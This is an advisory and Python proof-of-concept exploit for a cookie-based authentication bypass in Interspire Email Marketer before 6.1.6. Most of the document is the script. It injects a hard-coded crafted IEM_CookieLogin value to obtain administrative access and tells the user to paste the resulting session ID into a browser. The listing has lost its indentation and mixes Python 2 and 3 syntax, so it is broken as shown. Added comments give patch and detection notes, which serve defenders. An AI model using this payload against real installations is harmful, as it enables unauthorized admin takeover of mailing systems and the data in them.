The function in charge of checking whether the user is already logged in, in init.php, in Interspire Email Marketer (IEM) prior to 6.1.6 allows remote attackers to bypass authentication and obtain administrative access by using the IEM_CookieLogin cookie with a specially crafted value. On top of that, if the customer doesn't have an annual maintenance plan, the application reports that it is on the latest available version and that no update is available.
The vulnerabilities were found during an incident response on a compromised instance of the application.
Proof of Concept:
Details provided here: https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html

#### Usage Info
python magic_cookie.py url
import requests
import sys
# Proof-of-concept helper for the pre-6.1.6 IEM_CookieLogin authentication
# bypass described above: issues two GET requests to `url`, injects a fixed
# IEM_CookieLogin cookie into the session, and reports whether the response
# body changed afterwards.
# Indentation was lost in this listing and it mixes Python 2 `print`
# statements with call-style prints, so the nesting of the lines below is
# ambiguous and the file does not run as-is.
# Param url: base URL of the IEM instance (passed through from main()).
# Returns: the IEMSESSIONID cookie value read back after the forged cookie
# was set. NOTE: `session_rider` is only bound inside the loop when an
# IEMSESSIONID cookie is present; without one the `return` raises NameError.
# Defender notes: the weakness is that the login check in init.php accepts a
# crafted IEM_CookieLogin value without any prior authentication; upgrading
# to 6.1.6 or later closes it, and a request presenting IEM_CookieLogin from
# a client that never completed a login is the event to alert on.
def cookie_cutter(url):
with requests.Session() as s:
# The first GET only primes the session's cookie jar; the second is inspected.
s.get(url)
r = s.get(url)
# Baseline response body, compared later to see whether the server's
# answer changed after the cookie was injected.
response_regex = r.text
print("requesting initial Cookie\n")
print(str(r.headers)+"\n")
# Show the IEMSESSIONID cookie the server handed out to the anonymous session.
for key,value in s.cookies.items():
if "IEMSESSIONID" in key:
print "Key:"+key +",Value:" + value
print "-" * 25
print "forging Admin cookie"+"\n"
print "-" * 25
# Fixed crafted value taken verbatim from the original PoC (URL-encoded,
# hence the trailing %3D). Everything after this point is what a server-side
# log would see from a client exercising the bypass.
s.cookies.set('IEM_CookieLogin', "YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D")
# Dump the whole jar and remember the current IEMSESSIONID value; this is
# the value returned to the caller.
for key,value in s.cookies.items():
print "Key:"+key +",Value:" + value
print "-" * 25
if "IEMSESSIONID" in key:
session_rider = value
print "Making 2nd request with Forged Cookie\n"
print "-" * 25
# Second request carries the injected cookie alongside the session cookie.
r = s.get(url)
response_regex2 = r.text
# A differing body is the only success signal the PoC uses; it prints the
# full headers, status and body when the two responses are not identical.
if response_regex != response_regex2:
print "Response Headers"+"\n"
print "-" * 25
print(str(r.headers)+"\n")
print "-" * 25
print "Response Status Code"+"\n"
print str(r.status_code)+"\n"
print "-" * 25
print response_regex2+"\n"
print "-" * 25
return session_rider
# Entry point: reads the target URL from the command line, runs the PoC helper
# and prints the IEMSESSIONID value it returned.
# NOTE: sys.argv[1] is read without a length check, so running the script with
# no argument raises IndexError before anything else happens; the prints use
# Python 2 statement syntax, matching the rest of the listing.
def main():
url = sys.argv[1]
print url
# cookie_cutter returns the IEMSESSIONID value observed after the cookie
# injection (and raises NameError if the server never set one).
session_rider_value = cookie_cutter(url)
print "Magic Cookie Generated Modify Existing IEMSESSIONID Value In browser With Below Value "
print "-" * 25
print session_rider_value +"\n"
print "-" * 25
# Unguarded module-level call: main() runs on import as well as when executed
# directly (no `if __name__ == "__main__":` guard).
main()